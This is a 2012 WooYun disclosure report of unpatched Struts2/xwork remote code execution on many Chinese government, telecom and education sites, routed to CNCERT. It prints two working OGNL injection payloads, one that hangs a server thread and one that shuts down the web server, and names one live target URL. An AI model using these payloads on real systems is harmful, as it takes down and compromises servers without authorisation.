当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07633

漏洞标题:xwork设计缺陷导致远程代码执行即首批政府类入围名单

相关厂商:cncert国家互联网应急中心代

漏洞作者: shine

提交时间:2012-05-29 12:49

修复时间:2012-07-13 12:49

公开时间:2012-07-13 12:49

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-29: 细节已通知厂商并且等待厂商处理中
2012-05-29: 厂商已经确认,细节仅向厂商公开
2012-06-08: 细节向核心白帽子及相关领域专家公开
2012-06-18: 细节向普通白帽子公开
2012-06-28: 细节向实习白帽子公开
2012-07-13: 细节向公众公开

简要描述:

昨天,听@xsser说:“怀念中国移动大礼包”,如是做了个小测试,看半小时能找多少struts2那个老的远程代码执行漏洞站点或系统,没想到还有这么多,发出来,免得天天被人蹂躏还不知道怎么回事!
以下包括:国家电网、中国电信、中国移动、航空公司、政府部门类、教育类等站点或系统,多次测试结果都可以基本确认漏洞存在(如有误差请包涵!)。

详细说明:


以下站点或系统补丁不及时,测试代码如下(测试效果可能受不同系统架构的影响,如:cache服务器、集群系统、分布式系统,效果请耐心等待,自己没确认的就不方便发出):
sleep当前线程:

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.sleep(999999999)')(\u0023rt\[email protected]@currentThread()))=1


关闭web服务器:

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\[email protected]@getRuntime()))=1


漏洞证明:

mask 区域
*****ode*****
**********
*****taffLogi*****
**********
*****/doLogi*****
**********
1.://**.**.**/kjbm/login.action_
**********
*****0/login*****
**********
*****公^*****
*****.com.cn/lo*****
**********
*****.com/log*****
**********
*****n/login*****
**********
*****jmsp/login*****
**********
*****ogin/log*****
**********
*****/jjxt/In*****
**********
*****om/inde*****
**********
*****et/inde*****
**********
*****.cn/ind*****
**********
*****94/inde*****
**********
*****^查其他^*****
*****om.cn/in*****
**********
*****n/95598/in*****
**********
*****同一^*****
*****5598/inde*****
**********
*****cn/index*****
**********
2.://**.**.**/pub/index.action_
**********
*****op/member!i*****
**********
*****earch/ind*****
**********
*****ireless/in*****
**********
*****3/index*****
**********
*****n/zscsxt/I*****
**********
*****n/index*****
**********
*****Office/ma*****
**********
*****ovie/inde*****
**********
3.http://**.**.**/GIS/index.action_
**********
4.://**.**.**/xtw/news_index.action_
**********
5.http://**.**.**/portal/index/index.action_
**********
*****/shop/membe*****
**********
**********
**********
*****cod*****

修复方案:

使用CNCERT的分发功能,能提醒的都提醒一下吧!
(哦!还有一个肯德基宅急送的系统,也分发一下!)

http://www.4008823823.com.cn/kfcios/RegAction/login.action


版权声明:转载请注明来源 shine@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-05-29 16:34

厂商回复:

感谢shine同学的工作,同时强烈建议shine同学发表技术文档在zone.wooyun.org上。这些事件有一阵子来确认了,幸好目前已经积累了一些可控验证的用例,不过部分案例在复现时仍然不可避免会引起保护性危害。
针对近期的struts xwork <=2.2.0远程代码执行漏洞以及thinkphp的漏洞,建议白帽子可以将自己的成果汇总在wooyun上,同时一些有python\ruby脚本能力的同学,可以尝试完成更高级别的工作(这个可以有大礼包)。
rank 20.

最新状态:

2012-06-15:经过多日的验证及协调,目前上述涉及的政府、高校以及电信、电力、证券等相关行业网站已经派发事件完毕。